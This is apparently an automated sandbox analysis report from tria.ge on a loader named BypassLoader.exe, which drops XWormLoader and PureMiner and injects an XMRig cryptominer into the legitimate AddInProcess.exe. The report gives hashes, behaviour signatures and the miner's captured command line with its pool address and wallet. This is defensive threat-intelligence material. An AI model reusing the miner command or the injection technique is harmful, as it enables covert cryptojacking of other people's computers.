Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
184s -
max time network
194s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
13/10/2023, 02:46
Static task
static1
Behavioral task
behavioral1
Sample
BypassLoader.exe
Resource
win10-20230915-en
Behavioral task
behavioral2
Sample
BypassLoader.exe
Resource
win10v2004-20230915-en
General
-
Target
BypassLoader.exe
-
Size
803KB
-
MD5
7a55ed8e73f430327a2c8b189d837cd5
-
SHA1
ddbd958dc03cc94b4d7f035edc10826b8959c965
-
SHA256
31045e8b843ce541daf06fd133180f8ff675b3f9b729a11c85c3137fab188256
-
SHA512
ee8a6d6d6a284af233559b604d26be71b5079aa4c6619a2733fef8f3d60be3a9f09a617d1ec82094a23e9ba9aed0a81ea3ce25daab3ec49d10e57da0ca3aa316
-
SSDEEP
12288:QBCb1unQrlLM3z7PBWmEUWXS+CO0G03NquQENps9US+F:QIRhLM3QOwS+OG8YzENpf
Malware Config
Signatures
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/3944-30-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-31-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-32-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-34-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-35-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-36-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-37-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-38-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-39-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-40-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-42-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/3944-43-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 3920 XWormLoader.exe 2860 PureMiner.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2860 set thread context of 3944 2860 PureMiner.exe 76 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2428 3920 WerFault.exe 70 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe 2860 PureMiner.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2860 PureMiner.exe Token: SeLockMemoryPrivilege 3944 AddInProcess.exe Token: SeLockMemoryPrivilege 3944 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3944 AddInProcess.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2716 wrote to memory of 3920 2716 BypassLoader.exe 70 PID 2716 wrote to memory of 3920 2716 BypassLoader.exe 70 PID 2716 wrote to memory of 3920 2716 BypassLoader.exe 70 PID 2716 wrote to memory of 2860 2716 BypassLoader.exe 72 PID 2716 wrote to memory of 2860 2716 BypassLoader.exe 72 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76 PID 2860 wrote to memory of 3944 2860 PureMiner.exe 76
Processes
-
C:\Users\Admin\AppData\Local\Temp\BypassLoader.exe"C:\Users\Admin\AppData\Local\Temp\BypassLoader.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"2⤵
- Executes dropped EXE
PID:3920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 8443⤵
- Program crash
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\PureMiner.exe"C:\Users\Admin\AppData\Local\Temp\PureMiner.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.225.74.15:8383 -u 48Q5r42DnshBCULPq73bNXLwdJ2jng8QdDq6TZba79TGXL6Z4UNe61A2HUxqnNpUqn1JBZpm1Vv4XNxL28RBQUeR2RwVAGu.RIG_CPU_XMR -p x --algo rx/0 --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3944
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
628KB
MD5aab1dbe96f79d68a24833179fcb0aeed
SHA13a13dd38b46a94eb40972a07eb3864c4a207d299
SHA2568cef12cc709544a09e84fda051fa24480b093cb33dc8f8306807391d0c3b6091
SHA512e6a49984e9871a85c9307a1b4581e09bf0d1fe4cce6968746f17c61bfb8847dd4432b92a4b2588d38e2355ab95f7704a375e11e692984a310d080970f15e0202
-
Filesize
628KB
MD5aab1dbe96f79d68a24833179fcb0aeed
SHA13a13dd38b46a94eb40972a07eb3864c4a207d299
SHA2568cef12cc709544a09e84fda051fa24480b093cb33dc8f8306807391d0c3b6091
SHA512e6a49984e9871a85c9307a1b4581e09bf0d1fe4cce6968746f17c61bfb8847dd4432b92a4b2588d38e2355ab95f7704a375e11e692984a310d080970f15e0202
-
Filesize
101KB
MD539d81ca537ceb52632fbb2e975c3ee2f
SHA10a3814bd3ccea28b144983daab277d72313524e4
SHA25676c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA51218f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
-
Filesize
101KB
MD539d81ca537ceb52632fbb2e975c3ee2f
SHA10a3814bd3ccea28b144983daab277d72313524e4
SHA25676c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA51218f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a